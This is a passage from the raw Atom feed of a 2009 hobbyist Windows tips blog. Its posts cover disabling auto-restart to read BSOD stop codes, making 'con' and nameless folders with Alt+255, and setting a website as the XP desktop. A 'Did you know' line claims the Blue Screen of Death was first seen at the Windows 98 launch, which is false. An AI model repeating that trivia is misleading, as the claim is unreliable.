click on the &lt;b&gt;Settings&lt;/b&gt; button. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;6.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;In the &lt;i&gt;Startup and Recovery&lt;/i&gt; window, locate and &lt;b&gt;uncheck&lt;/b&gt; the check box next to &lt;i&gt;Automatically restart&lt;/i&gt;. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;7.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Click &lt;b&gt;OK&lt;/b&gt; in the &lt;i&gt;Startup and Recovery&lt;/i&gt; window. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;8.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Click &lt;b&gt;OK&lt;/b&gt; in the &lt;i&gt;System Properties&lt;/i&gt; window. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;9.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;You can now close the &lt;i&gt;System&lt;/i&gt; window. &lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=""&gt;10.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;  &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;From now on, when a problem causes a BSOD or another major error that halts the system, the PC will not automatically reboot. Rebooting manually will be necessary. &lt;/p&gt;  &lt;p class="MsoNormal"&gt;NOW WHAT IS THE ADVANTAGE OF VIEWING THIS ?&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Carefully note the code after STOP …..it will be sum thing like this “0X000008E” this part is very important. note this part down ..Google the error code and you will cum to know exactly which driver or file was malfunctioning&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/Sd9iGQpaeEI/AAAAAAAAAFo/pVLqICAB9NU/s1600-h/BILL-GATES-bsod.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 384px; height: 264px;" src="http://1.bp.blogspot.com/_T53992hHLOM/Sd9iGQpaeEI/AAAAAAAAAFo/pVLqICAB9NU/s400/BILL-GATES-bsod.jpg" alt="" id="BLOGGER_PHOTO_ID_5323081144262621250" border="0" /&gt;&lt;/a&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-weight: bold;"&gt;DID YOU KNOW ?&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;The Blue screen Of Death was first seen while Bill Gates was giving the demo on Windows 98 during its official launch in Los Angeles.Windows 98 crashed in front of a live audience comprising more than 500 journalists ,IT prefesssionals and the entire Microsoft core Team.&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-8705471416965309018?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/8705471416965309018/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/bsod.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8705471416965309018'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8705471416965309018'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/bsod.html' title='BSOD'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/Sd9h2X4LQ7I/AAAAAAAAAFg/ap9vs-PPSUc/s72-c/BSOD_2.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-1832658726535568699</id><published>2009-04-09T12:28:00.000-07:00</published><updated>2009-04-09T12:35:35.317-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>CREATE ICONS WITHOUT NAMES</title><content type='html'>I had posted an article few days ago on filenames &amp;amp; I had got a cool comment from one of my friend. I had challenged him to try an create a folder named ‘con’…and here was the reply&lt;br /&gt;&lt;br /&gt;                                             "&lt;br /&gt;&lt;div style="text-align: center;"&gt;Here is a simple method..........&lt;br /&gt;Rename folder from the right click option........&lt;br /&gt;Now press alt and press 255...&lt;br /&gt;press 255 frm the right sideof the key bords i.e., num pad....&lt;br /&gt;where only numbers r given.....&lt;br /&gt;now write con and then press enter.....huh!!&lt;br /&gt;you ll see a con folder in ur pc&lt;br /&gt;and also you can delete it easily.&lt;br /&gt;&lt;/div&gt;                                                                                                                         "&lt;br /&gt;&lt;br /&gt;Now lets analyze what is happening here when alt+255 is pressed a blank space character is created so the name of the file becomes ”(space)con” instead of “con” so u can rename it as ‘con’&lt;br /&gt;&lt;br /&gt;..First question .&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Why cant you rename a file a ‘con’ when u can give any name to any file ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The reason is ‘Con’ stands for ‘console’ and it is a reserved file name  .However there are ways to rename a file as con ..but ull hav to do it in DOS  mode..&lt;br /&gt;Now how to create an icon without a name …..SIMPLE..just repeat the above method ..n instead of typing con just press enter ..n u get an Icon without a name&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/Sd5M7vgXnMI/AAAAAAAAAFY/BtD3QkThkHA/s1600-h/CONFIL.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 168px; height: 154px;" src="http://2.bp.blogspot.com/_T53992hHLOM/Sd5M7vgXnMI/AAAAAAAAAFY/BtD3QkThkHA/s400/CONFIL.jpg" alt="" id="BLOGGER_PHOTO_ID_5322776398846729410" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;To make more than 1 blank icon ..next time just put 2 blank spaces instead of 1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;for more details mail me at arka_b1990@yahoo.co.in&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-1832658726535568699?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/1832658726535568699/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/create-icons-without-names.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/1832658726535568699'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/1832658726535568699'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/create-icons-without-names.html' title='CREATE ICONS WITHOUT NAMES'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/Sd5M7vgXnMI/AAAAAAAAAFY/BtD3QkThkHA/s72-c/CONFIL.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5636096282144512713</id><published>2009-04-08T07:23:00.000-07:00</published><updated>2009-04-08T07:34:27.201-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>Put any site on desktop in windows XP </title><content type='html'>&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.postbody 	{mso-style-name:postbody;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style="font-style: italic;" class="postbody"&gt;&lt;b&gt;&lt;span style=";font-family:&amp;quot;;font-size:15;"  &gt;To start right click anywhere on your desktop and choose Properties &gt; Desktop &gt; Customize Desktop &gt; Web. You should be at this window&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/Sdyzs52iUyI/AAAAAAAAAE4/ZsV_GO2AjkE/s1600-h/DESKTOP.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 358px; height: 400px;" src="http://4.bp.blogspot.com/_T53992hHLOM/Sdyzs52iUyI/AAAAAAAAAE4/ZsV_GO2AjkE/s400/DESKTOP.jpg" alt="" id="BLOGGER_PHOTO_ID_5322326443670262562" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/Sdy0cxdv56I/AAAAAAAAAFA/_TVF6AFYoHs/s1600-h/DESKTOP4.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 334px; height: 400px;" src="http://1.bp.blogspot.com/_T53992hHLOM/Sdy0cxdv56I/AAAAAAAAAFA/_TVF6AFYoHs/s400/DESKTOP4.jpg" alt="" id="BLOGGER_PHOTO_ID_5322327266052532130" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Trebuchet MS"; 	panose-1:2 11 6 3 2 2 2 2 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:647 0 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.postbody 	{mso-style-name:postbody;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;span class="postbody"&gt;&lt;b&gt;&lt;span style="font-size:15;"&gt;Click on the New button and type the address of the Web Site you would like to have as your desktop.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: center; font-style: italic;" align="center"&gt;&lt;b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="text-align: center;" align="center"&gt;&lt;span style="font-style: italic;" class="postbody"&gt;&lt;b&gt;&lt;span style="font-size:15;"&gt;Click Ok&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: center;" align="center"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: center;" align="center"&gt;THE THIS WINDOW WILL COME UP&lt;/p&gt;&lt;p style="text-align: center;" align="center"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: center;" align="center"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/Sdy08bri-NI/AAAAAAAAAFI/zv3hvf_XQdE/s1600-h/desktop1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 158px;" src="http://2.bp.blogspot.com/_T53992hHLOM/Sdy08bri-NI/AAAAAAAAAFI/zv3hvf_XQdE/s400/desktop1.jpg" alt="" id="BLOGGER_PHOTO_ID_5322327809960638674" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="text-align: center;" align="center"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Trebuchet MS"; 	panose-1:2 11 6 3 2 2 2 2 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:647 0 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.postbody 	{mso-style-name:postbody;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;span class="postbody"&gt;&lt;b&gt;&lt;span style="font-size:15;"&gt;On the next window you have the option to customize the Desktop Synchronization. Click Customize, then next and select how you want it to synchronize. If your using a website that requires a password enter it now and click finish. Click Ok.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: center; font-style: italic;" align="center"&gt;&lt;b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;span class="postbody"&gt;&lt;b&gt;&lt;span style="font-size:15;"&gt;Windows will then synchronize the page to make it available for your desktop.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/Sdy1Sa2xHbI/AAAAAAAAAFQ/8H_tsVOYsZg/s1600-h/desktop2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 123px;" src="http://1.bp.blogspot.com/_T53992hHLOM/Sdy1Sa2xHbI/AAAAAAAAAFQ/8H_tsVOYsZg/s400/desktop2.jpg" alt="" id="BLOGGER_PHOTO_ID_5322328187696389554" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;span style="font-style: italic;"&gt;Now the web page  will be available on the desktop&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;span style="font-style: italic;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: center; font-style: italic;" align="center"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;   &lt;span style="font-style: italic;" class="postbody"&gt;&lt;b&gt;&lt;span style="font-size:15;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b style="font-style: italic;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5636096282144512713?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5636096282144512713/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/put-any-site-on-desktop-in-windows-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5636096282144512713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5636096282144512713'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/put-any-site-on-desktop-in-windows-xp.html' title='Put any site on desktop in windows XP '/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/Sdyzs52iUyI/AAAAAAAAAE4/ZsV_GO2AjkE/s72-c/DESKTOP.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-7691168215184012143</id><published>2009-04-07T10:01:00.000-07:00</published><updated>2009-04-07T11:07:45.334-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>FASTEST SHUTDOWN METHOD</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */ 